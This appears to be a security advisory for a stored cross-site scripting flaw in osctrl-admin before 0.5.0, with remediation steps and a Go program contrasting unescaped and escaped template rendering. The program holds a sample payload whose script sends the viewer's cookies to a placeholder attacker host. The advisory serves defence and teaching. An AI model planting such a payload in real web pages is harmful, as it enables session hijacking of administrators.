Stored Cross-Site Scripting (XSS) in osctrl-admin On-Demand Query List
Vulnerability ID: CVE-2026-28280
CVSS Score: 6.1
Published: 2026-02-28
A Stored Cross-Site Scripting (XSS) vulnerability exists in the osctrl-admin component of osctrl versions prior to 0.5.0. The vulnerability allows authenticated users with low-level 'query' permissions to inject malicious JavaScript via the on-demand query interface. These payloads are stored in the backend database and subsequently rendered without sufficient context-aware encoding in the administrative dashboard. When an administrator views the query history, the script executes, potentially leading to session hijacking or privilege escalation.
TL;DR
osctrl-admin < 0.5.0 contains a Stored XSS vulnerability. Low-privilege users can inject JavaScript into query logs, which execute when admins view the On-Demand Query List. Fixed in version 0.5.0.
⚠️ Exploit Status: POC
Technical Details
- CWE ID: CWE-79
- Attack Vector: Network
- CVSS Score: 6.1 (Medium)
- EPSS Score: 0.00023
- Impact: High (Confidentiality/Integrity)
- Exploit Status: PoC Available
Affected Systems
- osctrl-admin < 0.5.0
- osctrl: < 0.5.0 (Fixed in: 0.5.0)
Code Analysis
Commit: b478377
Sanitized query in on-demand query list
Code changes implementing context-aware encoding for query display.
Exploit Details
- NVD: Vulnerability details and analysis
Mitigation Strategies
- Upgrade to patched version
- Input Validation
- Output Encoding
- Principle of Least Privilege
Remediation Steps:
- Pull the latest docker images or binaries for osctrl v0.5.0.
- Redeploy the osctrl-admin service.
- Verify the fix by saving an on-demand query whose name or body contains HTML tags (for example, test wrapped in a bold tag, `<b>test</b>`) and confirming that the On-Demand Query List renders the tags as literal text rather than as markup.
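The commit summary above says the fix applies context-aware encoding to the query display, and the last remediation step asks you to confirm that stored tags now render as literal text. The following Go program is an added illustration of both points; it is not osctrl's code, and the row template, the `QueryRow` field names and the constructed payload are assumptions. It renders the same table row once with `text/template` (no escaping, the pre-0.5.0 failure mode) and once with `html/template` (context-aware escaping), then checks whether a raw `<script` tag survives into the output.

```go
package main

import (
	"bytes"
	"fmt"
	htmltemplate "html/template"
	"strings"
	texttemplate "text/template"
)

// QueryRow is a constructed stand-in for one saved on-demand query as it
// would be listed in an admin page. The field names are assumptions, not
// osctrl's own data model.
type QueryRow struct {
	Name  string
	Query string
}

// rowTmpl is the same row markup rendered two different ways below.
// The Name and Query values sit in HTML element content.
const rowTmpl = `<tr><td>{{.Name}}</td><td>{{.Query}}</td></tr>`

// renderUnsafe renders the row with text/template, which performs no HTML
// escaping: whatever the low-privilege user stored is emitted verbatim into
// the admin page. This models the stored XSS failure mode.
func renderUnsafe(r QueryRow) (string, error) {
	t, err := texttemplate.New("row").Parse(rowTmpl)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, r); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// renderSafe renders the same row with html/template, which escapes
// according to the context each value lands in. In element content
// '<', '>', '&' and quotes become entities, so a stored payload is shown
// as literal text instead of being parsed as markup.
func renderSafe(r QueryRow) (string, error) {
	t, err := htmltemplate.New("row").Parse(rowTmpl)
	if err != nil {
		return "", err
	}
	var buf bytes.Buffer
	if err := t.Execute(&buf, r); err != nil {
		return "", err
	}
	return buf.String(), nil
}

// ContainsRawTag reports whether rendered HTML still carries an unescaped
// "<script" opening tag, i.e. whether the payload would execute in the
// browser of an administrator viewing the list.
func ContainsRawTag(html string) bool {
	return strings.Contains(html, "<script")
}

func main() {
	// Constructed payload of the kind a 'query'-level user could save.
	// attacker.example is a placeholder hostname, not a real endpoint.
	row := QueryRow{
		Name:  `<script>fetch("https://attacker.example/?c="+document.cookie)</script>`,
		Query: "SELECT * FROM users;",
	}

	unsafe, err := renderUnsafe(row)
	if err != nil {
		panic(err)
	}
	safe, err := renderSafe(row)
	if err != nil {
		panic(err)
	}

	fmt.Println("text/template (vulnerable):", unsafe)
	fmt.Println("  raw <script> present:", ContainsRawTag(unsafe))
	fmt.Println("html/template (hardened):  ", safe)
	fmt.Println("  raw <script> present:", ContainsRawTag(safe))
}
```

The same check can be run against a live instance by saving the payload through the query UI and grepping the admin page's HTML for `<script` versus `&lt;script`; only the escaped form should appear after upgrading to 0.5.0. Note that `html/template` is only correct when the untrusted value is passed as a plain string: marking it `template.HTML` would bypass the escaping and reintroduce the bug.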
References
Read the full report for CVE-2026-28280 on our website for more details including interactive diagrams and full exploit analysis.